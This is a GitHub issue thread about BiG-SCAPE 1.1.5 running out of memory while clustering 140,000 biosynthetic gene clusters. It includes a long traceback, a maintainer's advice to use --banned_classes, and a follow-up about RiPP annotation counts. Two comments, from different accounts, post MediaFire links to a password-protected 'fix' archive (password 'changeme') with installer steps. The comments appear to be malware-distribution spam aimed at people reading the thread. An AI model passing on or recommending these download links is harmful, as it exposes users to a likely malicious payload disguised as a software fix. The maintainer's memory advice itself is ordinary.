### ISSUE TITLE
OSError: [Errno 12] Cannot allocate memory

### ISSUE THREAD

**Issue by PuziJiang** [medema-group/BiG-SCAPE#175]
Dear Sir,
I used 64 CPUs and provided 2TB of memory to run BiG-SCAPE-1.1.5,  for clustering 140,000 BGCs. However, I encountered the following error: OSError: [Errno 12] Cannot allocate memory. The complete output file is shown below:
WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

WARNING! This alignment consists of closely-related and very-long sequences.
WARNING! FastTree (or other standard maximum-likelihood tools)
may not be appropriate for aligments of very closely-related sequences
like this one, as FastTree does not account for recombination or gene conversion

Exception in thread Thread-16:
Traceback (most recent call last):
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/threading.py", line 916, in _
bootstrap_inner
    self.run()
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/threading.py", line 864, in r
un
    self._target(*self._args, **self._kwargs)
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/pool.py", lin
e 405, in _handle_workers
    pool._maintain_pool()
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/pool.py", lin
e 246, in _maintain_pool
    self._repopulate_pool()
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/pool.py", lin
e 239, in _repopulate_pool
    w.start()
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/process.py", 
line 105, in start
    self._popen = self._Popen(self)
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/context.py", 
line 277, in _Popen
    return Popen(process_obj)
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/popen_fork.py
", line 19, in __init__
    self._launch(process_obj)
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/multiprocessing/popen_fork.py
", line 66, in _launch
    self.pid = os.fork()
OSError: [Errno 12] Cannot allocate memory

Traceback (most recent call last):
  File "/share/appspace_data/shared_groups/software/BiG-SCAPE-1.1.5/bigscape.py", line 3261, in <module>
    htmlFolder=network_html_folder)
  File "/share/appspace_data/shared_groups/software/BiG-SCAPE-1.1.5/bigscape.py", line 1648, in clusterJs
onBatch
    p = subprocess.Popen(command, stdout=newick_file, shell=False)
  File "/share/appspace_data/shared_groups//conda/env/bigscape/lib/python3.6/subprocess.py", line 729, in 
__init__
    restore_signals, start_new_session)
  File "/share/appspace_data/shared_groups/conda/env/bigscape/lib/python3.6/subprocess.py", line 1295, in
 _execute_child
    restore_signals, start_new_session, preexec_fn)
OSError: [Errno 12] Cannot allocate memory
Job 11861687 stderr output:

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PuziJiang** [comment]
And I have another question: 
The file "Network_Annotations_Full.tsv" shows the number of RiPPs is 40698, but the BGC numbers in the file "Network_Annotations_RiPPs.tsv" is 41263. Which results should I use?

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jorgecnavarrom** [comment]
Hi

About the first question: yes, unfortunately BiG-SCAPE 1 is very memory intensive. One option here would be to break down the analysis by running with `--banned_classes` so that you only calculate a single class at the time

I don't really know for the second question though; the class annotations should be a subset of the full one. Can you know which lines appear in "Full" that don't appear in "RiPPs"? Perhaps a comparison software like kdiff3, WinMerge or CompareMerge2

**Comment by PuziJiang** [comment]
Dear Sir,
Thanks for your reply! I solved the memory problem when I used the parameter "--banned_classes".

About the number of BiG-SCAPE classes, I checked the Network_Annotations_Full.tsv and Network_Annotations of each class, and I found that some BGCs did not appear in "Full" but appear in "RiPPs". These BGCs are annotated as the hybrids of RiPPs and other type. 
I did not set any parameter, and BiG-SCAPE still put the hybrid BGCs in every different individual class, right?

![WechatIMG1379](https://github.com/user-attachments/assets/f4f63b96-6217-4a00-b2d4-c8abef799eea)
![WechatIMG1380](https://github.com/user-attachments/assets/d4c01bcf-99c3-4f76-b00e-7db3fe6ee2fe)
